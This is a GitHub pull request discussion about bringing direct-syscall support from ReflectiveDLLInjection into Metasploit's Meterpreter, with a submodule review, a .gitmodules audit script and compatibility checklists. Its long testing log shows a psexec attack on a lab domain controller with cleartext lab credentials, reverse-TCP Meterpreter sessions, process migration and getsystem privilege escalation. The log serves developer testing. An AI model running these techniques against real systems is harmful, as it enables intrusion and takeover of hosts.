Pull in changes from ReflectiveDLLInjection to support direct syscalls (2) #694
Conversation
- Includes ColdGate.c in each project
- Change railgun macro name to stdcall_func
- Update VS configs
- Update cmake files for mingw
- Fix cmake files for kiwi builds
- Update ReflectiveDLLInjection module to verify if CI passes
- Update include file names & ReflectiveDLLInjection submodule
.gitmodules
Outdated
url = https://github.com/rapid7/ReflectiveDLLInjection.git | ||
url = https://github.com/cdelafuente-r7/ReflectiveDLLInjection.git | ||
branch = direct_syscalls2 |
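Review bot: the `url` line now points the submodule at a personal fork (cdelafuente-r7) and a `branch = direct_syscalls2` override is added, so the build tree depends on a fork branch that can be rebased or deleted; revert to `url = https://github.com/rapid7/ReflectiveDLLInjection.git` with no `branch` key before merge and pin the wanted revision through the superproject's recorded submodule commit instead. Note that the `branch` key only influences `git submodule update --remote`; a plain `git submodule update --init` still checks out the recorded commit hash, so the override does not by itself make CI build the branch tip.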
I'm pretty sure that because you've made a pull request to rapid7/ReflectiveDLLInjection from your own branch you actually don't need these changes in this file. The reference will be resolved and the changes in your PR will be pulled in. That would actually be the ideal way to have this configured because then this PR could be landed without needing to revert these changes here.
If and when you make changes to the ReflectiveDLLInjection repo, you'd just `git pull` your changes however you need to so the commit hash is correct.
Yes, I agree, this was the original implementation, but we wanted to check if CI was passing with all these changes (see this comment). I'll roll back to the original once the ReflectiveDLLInjection PR is landed.
Also, I'm fine to revert it now if you think it was not a good idea.
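As an added example (not code from the PR or from either repository), a small POSIX shell audit that flags exactly the two things the review above asks to drop: a submodule URL outside the expected rapid7 organisation and a `branch =` override. The submodule path in the constructed samples is a placeholder, since the real path is not given on this page.

```shell
#!/bin/sh
# Added example, not code from the PR: audit a .gitmodules file for submodule
# entries that point outside the expected upstream organisation or that carry
# a "branch =" override. Assumes the standard layout written by
# "git submodule add": [submodule "name"] / path = ... / url = ... / branch = ...

ALLOWED_ORG="https://github.com/rapid7/"

# check_gitmodules FILE
# Prints one finding per line (FOREIGN-URL or BRANCH-OVERRIDE) and returns 1
# when any submodule is not cleanly pinned to upstream, 0 otherwise.
check_gitmodules() {
    awk -v allowed="$ALLOWED_ORG" '
        BEGIN { bad = 0; name = "" }
        # Emit findings for the [submodule] section collected so far.
        function flush() {
            if (name == "") return
            if (index(url, allowed) != 1) {
                printf "FOREIGN-URL %s -> %s\n", name, url; bad = 1
            }
            if (branch != "") {
                printf "BRANCH-OVERRIDE %s -> %s\n", name, branch; bad = 1
            }
        }
        /^\[submodule "/ {
            flush()
            name = $0
            sub(/^\[submodule "/, "", name); sub(/".*$/, "", name)
            url = ""; branch = ""
            next
        }
        /^[ \t]*url[ \t]*=/    { sub(/^[^=]*=[ \t]*/, ""); sub(/[ \t\r]+$/, ""); url = $0 }
        /^[ \t]*branch[ \t]*=/ { sub(/^[^=]*=[ \t]*/, ""); sub(/[ \t\r]+$/, ""); branch = $0 }
        END { flush(); exit bad }
    ' "$1"
}

# write_samples PR_FILE CLEAN_FILE
# Constructed samples: the fork-pointing form from the PR's test commit, then
# the canonical upstream form. PLACEHOLDER stands in for the real submodule path.
write_samples() {
    cat > "$1" <<'EOF'
[submodule "PLACEHOLDER/ReflectiveDLLInjection"]
    path = PLACEHOLDER/ReflectiveDLLInjection
    url = https://github.com/cdelafuente-r7/ReflectiveDLLInjection.git
    branch = direct_syscalls2
EOF
    cat > "$2" <<'EOF'
[submodule "PLACEHOLDER/ReflectiveDLLInjection"]
    path = PLACEHOLDER/ReflectiveDLLInjection
    url = https://github.com/rapid7/ReflectiveDLLInjection.git
EOF
}

# Stand-alone run: audit both samples and report the verdict for each.
demo_dir=$(mktemp -d)
write_samples "$demo_dir/pr.gitmodules" "$demo_dir/clean.gitmodules"
for f in "$demo_dir/pr.gitmodules" "$demo_dir/clean.gitmodules"; do
    if check_gitmodules "$f"; then
        echo "OK    $f"
    else
        echo "FAIL  $f"
    fi
done
rm -rf "$demo_dir"
```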
I've tested the 32-bit and 64-bit payloads with the MSVC and MinGW builds. Everything I've tested appears to be working as intended.
- 🟢 MinGW builds from docker work for x86 and x64
- 🟢 MSVC builds all compile without any issues
- 🟢 x86 payloads work on 64-bit hosts by running in Wow64 as tested on Windows 11
- 🟢 Migrate works for x86 and x64 payloads
- 🟢 `getsystem` works as intended
- 🟢 `hashdump` works as intended
Testing Output
msf6 exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|MSFLAB as user 'smcintyre'...
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x64.dll is being used
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (554937 bytes) to 192.168.159.10
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x64.dll is being used
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:49701) at 2024-01-11 14:36:36 -0500
meterpreter > sysinfo
Computer : DC
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : MSFLAB
Logged On Users : 7
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 1...
smsf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.159.10 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain MSFLAB no The Windows domain to use for authentication
SMBPass Password1! no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser smcintyre no The username to authenticate as
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.159.10 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain MSFLAB no The Windows domain to use for authentication
SMBPass Password1! no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser smcintyre no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|MSFLAB as user 'smcintyre'...
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x86.dll is being used
[*] Sending stage (488696 bytes) to 192.168.159.10
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x86.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x86.dll is being used
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.10:49705) at 2024-01-11 14:39:47 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DC
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : MSFLAB
Logged On Users : 7
Meterpreter : x86/windows
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
116 652 dwm.exe x64 1 Window Manager\DWM-1 C:\Windows\System32\dwm.exe
136 4 Registry x64 0
344 4 smss.exe x64 0
396 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
448 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
464 448 csrss.exe x64 0
572 448 wininit.exe x64 0
580 564 csrss.exe x64 1
652 564 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
728 572 services.exe x64 0
748 572 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
804 652 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
972 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
992 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1048 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1056 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1120 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1128 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1136 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1248 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1256 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1272 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1300 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1368 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1488 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1576 572 fontdrvhost.exe x64 0 Font Driver Host\UMFD-0 C:\Windows\System32\fontdrvhost.exe
1580 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1624 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1676 652 fontdrvhost.exe x64 1 Font Driver Host\UMFD-1 C:\Windows\System32\fontdrvhost.exe
1716 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1768 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1776 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1784 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1812 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1832 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1856 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1900 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2004 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2096 1508 SIHClient.exe x64 0
2120 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2148 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2160 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2224 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2276 2812 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2312 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2336 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2444 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2500 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2536 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2556 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2620 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2808 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3320 728 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
3424 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3432 728 dns.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dns.exe
3440 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3448 728 Microsoft.ActiveDirectory.WebServices.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
3456 728 ismserv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\ismserv.exe
3464 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3472 728 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
3480 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
3488 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3500 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
3512 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3524 728 MsMpEng.exe x64 0
3536 728 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
3544 728 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfsrs.exe
3560 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3660 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3808 728 dfssvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfssvc.exe
3996 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
4448 992 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
4592 728 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe
4620 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
4732 2276 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
4740 728 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
5364 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5528 728 svchost.exe x64 0
5596 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5636 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5652 3400 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
5676 728 svchost.exe x64 0
5684 5652 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
5708 728 svchost.exe x64 0
5816 992 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
meterpreter > migrate 1368
[*] Migrating from 2276 to 1368...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x64.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x64.dll is being used
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/elevator.x64.dll is being used
[-] stdapi_sys_config_getuid: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: 1346
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/elevator.x64.dll is being used
[-] stdapi_sys_config_getuid: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
meterpreter > exit
[*] Shutting down session: 2
[*] 192.168.159.10 - Meterpreter session 2 closed. Reason: User exit
msf6 exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|MSFLAB as user 'smcintyre'...
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x86.dll is being used
[*] Sending stage (488696 bytes) to 192.168.159.10
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x86.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x86.dll is being used
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.10:49726) at 2024-01-11 14:42:44 -0500
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
116 652 dwm.exe x64 1 Window Manager\DWM-1 C:\Windows\System32\dwm.exe
136 4 Registry x64 0
344 4 smss.exe x64 0
396 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
448 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
464 448 csrss.exe x64 0
572 448 wininit.exe x64 0
580 564 csrss.exe x64 1
652 564 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
728 572 services.exe x64 0
748 572 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
804 652 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
972 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
992 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1048 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1056 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1120 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1128 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1136 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1248 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1256 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1272 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1300 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1368 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1488 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1576 572 fontdrvhost.exe x64 0 Font Driver Host\UMFD-0 C:\Windows\System32\fontdrvhost.exe
1580 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1624 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1676 652 fontdrvhost.exe x64 1 Font Driver Host\UMFD-1 C:\Windows\System32\fontdrvhost.exe
1716 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1768 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1776 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1784 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1812 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1832 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1856 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1900 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2004 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2120 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2148 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2160 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2224 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2248 4384 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
2312 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2336 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2444 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2500 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2536 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2556 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2620 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2808 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3320 728 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
3424 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3432 728 dns.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dns.exe
3440 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3448 728 Microsoft.ActiveDirectory.WebServices.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
3456 728 ismserv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\ismserv.exe
3464 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3472 728 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
3480 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
3488 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3500 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
3512 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3524 728 MsMpEng.exe x64 0
3536 728 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
3544 728 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfsrs.exe
3560 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3660 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3808 728 dfssvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfssvc.exe
3996 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
4384 5704 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
4448 992 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
4592 728 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe
4620 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
4740 728 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
5264 5344 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
5344 1856 CompatTelRunner.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\CompatTelRunner.exe
5364 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5528 728 svchost.exe x64 0
5596 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5636 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5652 3400 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
5684 5652 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
5816 992 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
6020 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
meterpreter > migrate 396
[*] Migrating from 4384 to 396...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x64.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x64.dll is being used
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > sysinfo
Computer : DC
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : MSFLAB
Logged On Users : 7
Meterpreter : x64/windows
meterpreter > getsystem
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/elevator.x64.dll is being used
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Windows 10x64
For what it is worth, while Win 10x64 appears to work, I'm having trouble with Win10x86. I'll dig a bit deeper tomorrow:
Windows 2003x86:
- 🟢 Win2003x86 SP0
- 🟢 Win2003x86 SP1
- 🟢 Win2003x86R2 SP1
- 🟢 Win2003x86R2 SP2
Windows 8x86:
- 🟢 Windows 8x86
- 🟢 Windows 8.1x86
- 🟢 Windows 8.1 x86 SP1
- 🟢 Windows 10x86
- 🟢 Windows 10x64 WOW64
Not sure why, but it looks like x86 payloads are failing on Windows 2008x64. The x64 payloads work, and both work on 2008x64 R2.
- 🔴 Windows 2008x64 R1 WOW64
- Windows 2008 x64 R1
- Windows 2008 x64 R2
Thank you @bwatters-r7 for testing. I've updated the
- 🟢 Windows 10x64 x64/WOW64
x86 Payloads on native x86 VMs:
- 🔴 Windows 10x86
- 🔴 Windows 8x86
- 🟢 Windows 7x86
- 🟢 Windows XP_SP3
- 🟢 Windows 10x64
- 🟢 Windows 10x64 WOW64
- 🟢 Windows 10x86
- 🟢 Windows 7-8 x86
